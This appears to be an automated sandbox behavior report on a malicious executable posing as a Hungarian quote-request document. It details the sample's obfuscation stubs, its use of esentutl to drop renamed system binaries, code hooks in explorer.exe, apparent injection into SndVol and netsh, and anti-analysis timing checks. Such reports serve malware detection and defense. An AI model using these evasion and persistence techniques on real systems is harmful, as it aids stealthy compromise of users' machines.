          Source: C:\Windows\SysWOW64\SndVol.exe; Section loaded: midimap.dll
          Source: C:\Windows\SysWOW64\netsh.exe; Section loaded: wininet.dll
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
          Source: Window Recorder; Window detected: More than 3 window changes detected
          Source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Static file information: File size 1056768 > 1048576
          Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: SndVol.pdbGCTL source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: netsh.pdb source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: easinvoker.pdb source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: wntdll.pdbUGP source: SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: netsh.pdbGCTL source: SndVol.exe, 00000005.00000003.1857901713.000000000279F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1857901713.000000000278F000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1887842160.0000000036530000.00000040.10000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4170356503.0000000001560000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: ping.pdbGCTL source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: wntdll.pdb source: SndVol.exe, SndVol.exe, 00000005.00000003.1782780302.00000000363B2000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.0000000036560000.00000040.00001000.00020000.00000000.sdmp, SndVol.exe, 00000005.00000003.1780846168.0000000036205000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000005.00000002.1888017059.00000000366FE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000007.00000003.1861588490.000000000368D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1857987184.00000000012FF000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.00000000039DE000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4170553406.0000000003840000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbH source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1748851394.000000007F080000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1830361363.000000007F4B0000.00000004.00001000.00020000.00000000.sdmp
          Source: Binary string: easinvoker.pdbGCTL source: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.0000000021611000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1769510665.00000000215E2000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782270171.0000000002765000.00000004.00000020.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1782775844.00000000029CE000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699414288.000000007FCE0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000002.1802025205.0000000020680000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, 00000000.00000003.1699986277.0000000002764000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: cmd.pdb source: esentutl.exe, 00000003.00000003.1766177513.0000000005350000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.3.dr
          Source: Binary string: ping.pdb source: esentutl.exe, 00000004.00000003.1771269701.0000000005700000.00000004.00001000.00020000.00000000.sdmp, xpha.pif.4.dr
          Source: Binary string: SndVol.pdb source: explorer.exe, 00000006.00000002.4182572675.0000000010F3F000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000007.00000002.4169965326.0000000001106000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000002.4171199207.0000000003D8F000.00000004.10000000.00040000.00000000.sdmp

          Data Obfuscation

          Source: Yara match; File source: 0.2.#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe.29a0000.0.unpack, type: UNPACKEDPE
          Source: Yara match; File source: 00000000.00000003.1700194533.000000007FAD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: alpha.pif.3.dr; Static PE information: 0xF8D87E17 [Thu Apr 20 00:53:43 2102 UTC]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B894C LoadLibraryW,GetProcAddress,FreeLibrary [0_2_029B894C]
          Source: alpha.pif.3.dr; Static PE information: section name: .didat
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029CD2FC push 029CD367h; ret [0_2_029CD35F]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029A63B0 push 029A640Bh; ret [0_2_029A6403]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029A63AE push 029A640Bh; ret [0_2_029A6403]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029A332C push eax; ret [0_2_029A3368]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029AC349 push 8B029AC1h; ret [0_2_029AC34E]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029CC378 push 029CC56Eh; ret [0_2_029CC566]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029CD0AC push 029CD125h; ret [0_2_029CD11D]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B306B push 029B30B9h; ret [0_2_029B30B1]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B306C push 029B30B9h; ret [0_2_029B30B1]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029CD1F8 push 029CD288h; ret [0_2_029CD280]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029BF108 push ecx; mov dword ptr [esp], edx [0_2_029BF10D]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029CD144 push 029CD1ECh; ret [0_2_029CD1E4]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029A6782 push 029A67C6h; ret [0_2_029A67BE]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029A6784 push 029A67C6h; ret [0_2_029A67BE]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029AD5A0 push 029AD5CCh; ret [0_2_029AD5C4]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029CC570 push 029CC56Eh; ret [0_2_029CC566]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029AC56C push ecx; mov dword ptr [esp], edx [0_2_029AC571]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B8AD8 push 029B8B10h; ret [0_2_029B8B08]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029BAADF push 029BAB18h; ret [0_2_029BAB10]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029BAAE0 push 029BAB18h; ret [0_2_029BAB10]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029ACA4F push 029ACD72h; ret [0_2_029ACD6A]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029ACBEC push 029ACD72h; ret [0_2_029ACD6A]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_02A14850 push eax; ret [0_2_02A14920]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B886C push 029B88AEh; ret [0_2_029B88A6]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B790C push 029B7989h; ret [0_2_029B7981]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B6948 push 029B69F3h; ret [0_2_029B69EB]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B6946 push 029B69F3h; ret [0_2_029B69EB]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B5E7C push ecx; mov dword ptr [esp], edx [0_2_029B5E7E]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_029B2F60 push 029B2FD6h; ret [0_2_029B2FCE]
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe; Code function: 0_2_208FEC50 push 38207BA7h; iretd [0_2_208FEC9D]
          Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_047D647E push ecx; ret [5_2_047D647F]

          Persistence and Installation Behavior

          Source: C:\Windows\SysWOW64\esentutl.exe; File created: C:\Users\Public\alpha.pif (3 identical entries)
          Source: C:\Windows\SysWOW64\esentutl.exe; File created: C:\Users\Public\xpha.pif (3 identical entries)

          Boot Survival

          Source: C:\Windows\SysWOW64\esentutl.exe; File created: C:\Users\Public\alpha.pif
          Source: C:\Windows\SysWOW64\esentutl.exe; File created: C:\Users\Public\xpha.pif

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xEF
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeCode function: 0_2_029BAB1C GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_029BAB1C
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\#U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe; Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\SndVol.exe; API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE22210774
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220D8A4
Source: C:\Windows\SysWOW64\netsh.exe; API/Special instruction interceptor: Address: 7FFE2220DA44
Source: C:\Windows\SysWOW64\SndVol.exe; RDTSC instruction interceptor: First address: 47C9904, second address: 47C990A; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\SndVol.exe; RDTSC instruction interceptor: First address: 47C9B7E, second address: 47C9B84; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe; RDTSC instruction interceptor: First address: B89904, second address: B8990A; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe; RDTSC instruction interceptor: First address: B89B7E, second address: B89B84; instructions: 0x00000000 rdtsc; 0x00000002 xor ecx, ecx; 0x00000004 add ecx, eax; 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\SndVol.exe; Code function: 5_2_047C9AB0 rdtsc
Source: C:\Windows\explorer.exe; Window / User API: threadDelayed 9763
Source: C:\Windows\explorer.exe; Window / User API: foregroundWindowGot 886
Source: C:\Windows\explorer.exe; Window / User API: foregroundWindowGot 869
Source: C:\Windows\SysWOW64\netsh.exe; Window / User API: threadDelayed 1485
Source: C:\Windows\SysWOW64\netsh.exe; Window / User API: threadDelayed 8487
Source: C:\Windows\SysWOW64\esentutl.exe; Dropped PE file which has not been started: C:\Users\Public\xpha.pif
Source: C:\Windows\SysWOW64\SndVol.exe; API coverage: 2.0 %
Source: C:\Windows\SysWOW64\netsh.exe; API coverage: 1.4 %
